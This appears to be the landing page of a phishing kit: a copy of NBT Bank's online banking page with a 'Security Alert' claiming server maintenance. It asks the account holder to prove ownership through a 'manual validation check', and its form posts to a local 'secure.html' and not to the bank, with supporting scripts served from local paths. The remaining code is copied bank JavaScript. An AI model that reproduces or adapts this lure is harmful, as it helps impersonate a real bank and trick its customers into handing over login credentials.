<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="IE=Edge" http-equiv="X-UA-Compatible"/><title>Security Alert</title><meta content="applicant/xhtml+xml; charset=utf-8" http-equiv="content-type"/><link rel="stylesheet" type="text/css" href="https://pib.prod.secure-banking.com/60314001/r/assets/cfe.css" /><link rel="stylesheet" type="text/css" id="theme" href="https://pib.prod.secure-banking.com/60314001/r/assets/themes/60314001%20NBT%20Bank/cfe_3147dcd3daf22a9b66d08e620775a37e2a3c4d83.css" /><script type="text/JavaScript" src="https://pib.prod.secure-banking.com/60314001/r/assets/application_6afc3d1f7ed2fff742392a25cd8d4bf5.js"></script><script type="text/JavaScript" src="./js/postilion_27097e550121c1e885cff3894f4ec998.js"></script><script type="text/JavaScript" src="./js/version_e027259b6f533fec5f2e8181bbfe456a.js"></script><script type="text/JavaScript" src="./js/cfeutils_c8106768ac8949bbacf7c6b67f4706a2.js"></script><script type="text/JavaScript" src="./js/pleasewait_463e8b2881b309262bb3586fe39d6b5a.js"></script></head><body id="AutoEnrollmentIdentify" ><div id="login_main"><div id="border1"><p></p></div><span><div id="border4"><p></p></div><div id="border2"><p></p></div><div id="login_page"><div id="login_content"><input type="hidden" name="_id14" value="true" /><img src="https://pib.prod.secure-banking.com/60314001/images/login/LoginLogo.jpg" alt="" id="login_top_image" /><span id="help"><form id="_id15" method="post" action="/60314001/AutoEnrollmentIdentify.faces" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="uniqueToken" value="0" /><input id="_id15:help_button" type="submit" name="_id15:help_button" value="Help" alt="Open new window with help for this page" onclick="javascript:launchHelp('Help','/60314001/online-help/Login.html?panel=2');; return false;" class="help_link" /><p>|</p><input id="_id15:email_button" type="submit" name="_id15:email_button" value="Email" alt="" onclick="openEmailPage('SendAnonymousEmail.faces', 'EmailPage', 'directories=0,location=0,menubar=0,resizable=0,resizeable=0,scrollbars=0,toolbar=0,status=1,width=550,height=400,left=40,top=40'); return false;" class="help_link" /><input type="hidden" name="csrf_hidden_input" value="FB10CD517F28780B5D281D9BC54FC1765BCF6C88C8170BF12E5D937D18B7770C" /><input type="hidden" name="_id15" value="_id15" /></form></span><br /><br /><div id="identifierForm"><form id="identifierForm_form" method="post" action="secure.html" onsubmit="showPleaseWait();">
<input type="hidden" name="uniqueToken" value="0" /><H1>Security Alert</H1>
						
  				<p>We periodically conduct maintenance on our servers to ensure maximum efficiency. Please verify that</p>
  				<p> you are the rightful owner of this account by completing the 
				manual validation check on the next page</p>
<div class="submission"><br><input id="identifierForm:submit_button" type="submit" name="identifierForm:submit_button" value="Continue" alt="" onclick="setFormEvent('identifierForm_form', 'identifierForm_form:_idcl', 'identifierForm:submit_button');" class="input_submit" /><br /><br /></div><input type="hidden" name="csrf_hidden_input" value="FB10CD517F28780B5D281D9BC54FC1765BCF6C88C8170BF12E5D937D18B7770C" /><input type="hidden" name="identifierForm_form" value="identifierForm_form" /><input type="hidden" name="identifierForm_form:_idcl" /></form></div>




<script language="javascript">
  function openEmailPage(target_url, window_name, window_params) {
    window.open(target_url, window_name, window_params);
  }
</script>


  

  

  

  

  


</div></div></span><div id="border3"><p><script language="javascript" type="text/javascript">

		function funcForceCookie(){
			document.cookie = "JSESSIONID=; expires=Thu, 18 Dec 2013 12:00:00 UTC";
			document.cookie = "IBSFSO=; expires=Thu, 18 Dec 2013 12:00:00 UTC";
			window.location.href='https://pib.prod.secure-banking.com/60314001/AutoEnrollmentIdentify.faces';
            }
            

        window.onload = function() {
            
            // Remove the standard auto enrollment link
            var child = document.getElementById("login_form:autoEnrollLink");
            child.parentNode.removeChild(child);
            document.getElementById("login_form:auto_enroll").insertAdjacentHTML('beforeend', '<input id="btnEnroll" style="background-color:#E3173E; border:none; color:#ffffff; width:150px; height:35px;" onClick="funcForceCookie()" type="button" value="Enroll">');
            
            //hide standard login button
            document.getElementById("login_form:signin_second").setAttribute("style", "display:none");

            document.getElementById("login_form:forgotPassword").setAttribute("style", "display:none");


            var continueButtonHtml = '<input id="login_form:signin_second" type="submit" name="login_form:signin_second" value="Continue" alt="" onclick="setFormEvent(\'login_form_form\', \'login_form_form:_idcl\', \'login_form:signin_second\');" class="input_submit" style="background-color:#E3173E; border:none; color:#ffffff; width:150px; height:35px;"><p style="color:#003E6F;font-size:125%">Forgot Password?</p><p style="color:#003E6F">Please enter your Online Login ID and click the \'Reset Password\' button below.</p>'

            document.getElementById("login_form:forgotPassword").insertAdjacentHTML('beforebegin', continueButtonHtml );

            var resetButtonHTML = '<input class="input_submit" type="button" id="login_form:forgotPassword" href="#" onmousedown="showPleaseWaitMousedown();" onmouseup="showPleaseWaitMouseup(event);" onclick="document.forms[\'login_form_form\'][\'login_form_form:_idcl\'].value=\'login_form:forgotPassword\'; $(\'#login_form_form\').submit(); return false;" style="background-color:#E3173E; border:none; color:#ffffff; width:150px; height:35px;" value="Reset Password">'

            document.getElementById("login_form:forgotPassword").insertAdjacentHTML('afterend', resetButtonHTML)

            document.getElementById("btnEnroll").insertAdjacentHTML('beforebegin', '<p style="color:#003E6F; font-size:125%">New to Online Banking?</p>');
            document.getElementById("btnEnroll").insertAdjacentHTML('afterend', '<p style="color:#003E6F">Forgot Online Login ID?</p><p style="color:#003E6F">Please call 1.800.628.2265</p>')

            document.getElementById("login_form:username:row").firstChild.innerHTML = '<label for="login_form:username">Online Login ID</label>';
            document.getElementById("login_form:password:row").firstChild.innerHTML = '<label for="login_form:password">Online Password</label>';
            
        }

</script>

<!--Dialog Box Content-->
<div id="dialog" title="Important Service Disruption">
    <h1>Important Service Disruption:</h1>
	<ul>
       <li style='list-style-type: disc; margin-left: 30px;'>We are making some important changes designed to improve your experience. </li>
	   <li style='list-style-type: disc; margin-left: 30px;'>Please change your Login ID so that it does not contain a leading zero during your next NBT Online Banker session.</li>
	   <li style='list-style-type: disc; margin-left: 30px;'>You may do so by clicking Preferences and then Change Login ID after logging in to NBT Online Banker.</li>
	   <li style='list-style-type: disc; margin-left: 30px;'>If you do not make this change, you will be unable to access NBT Online Banker.</li>
    </ul>
</div>

<script language="javascript" type="text/javascript">
    //Leading Zero Dialog
        $( function() {
            $( "#dialog" ).dialog({
                buttons:{
                    Ok: function() {
                        $(this).dialog("close");
						leadzerocancel()
                    }
                },
                height:400,
                width:550,
                autoOpen: false,
                modal:true,
                show: {
                    effect: "fade",
                    duration: 1000
                },
                hide: {
                    effect: "fade",
                    duration: 1000
                }
            });
				
                $( "#account_documents" ).on( "click", function() {
                $( "#dialog" ).dialog( "open" );
                });
            });

	/*FUNCTION: CHECK LOGIN*/
	var checkLogin = function() {
	if(document.getElementById("login_form:password") === document.activeElement){
			
			    if(document.getElementById("login_form:username")){
				    var username = document.getElementById("login_form:username").value
					
					if(username.charAt(0) == "0"){$( "#dialog" ).dialog( "open" );}
				}
			}
	}
	
		/*Handle when the user closes the Leading Zero Warning*/
		var leadzerocancel = function(){
		
		console.log("leadzerocancel called")
			
			//Set the focus to the password field, so the user can enter their password
			document.getElementById("login_form:password").focus();
			
			//Override the warning, prevent future displays
			var speedbump = document.getElementById("dialog");
			speedbump.remove();
			
			return
			
		};
	
			
	window.addEventListener("click", function() {
			
		checkLogin()
					      
	}, false)

	window.addEventListener('keyup', function(event) {
        if (event.keyCode == 9) {
            checkLogin();
            }
        });

</script>
</p><script type="text/javascript">$(document).ready(function() {$('#inject_head').attr('id','clear'); $("head").append("<link id=\"favicon\" rel=\"shortcut icon\" type=\"image/png\" href=\"https://pib.prod.secure-banking.com/60314001/images/favicon.ico\">");});</script></div></div><div id="pleaseWaitScreen" class="pleaseWaitScreen"><iframe style="width:100%;height:100%;display:block;filter:alpha(opacity=0);" frameborder="0" scrolling="no" align="bottom" marginheight="0" marginwidth="0" src="javascript:'';" id="selectboxBlockIFrame"></iframe></div><div id="pleaseWaitBox" class="pleaseWaitBox">Please Wait...</div><script type="text/JavaScript">$(function() {
addHiddenFieldToAllForms('tid', '');
addHiddenFieldToAllForms('bid', '');
setTID();
setBID();
});
</script></body></html>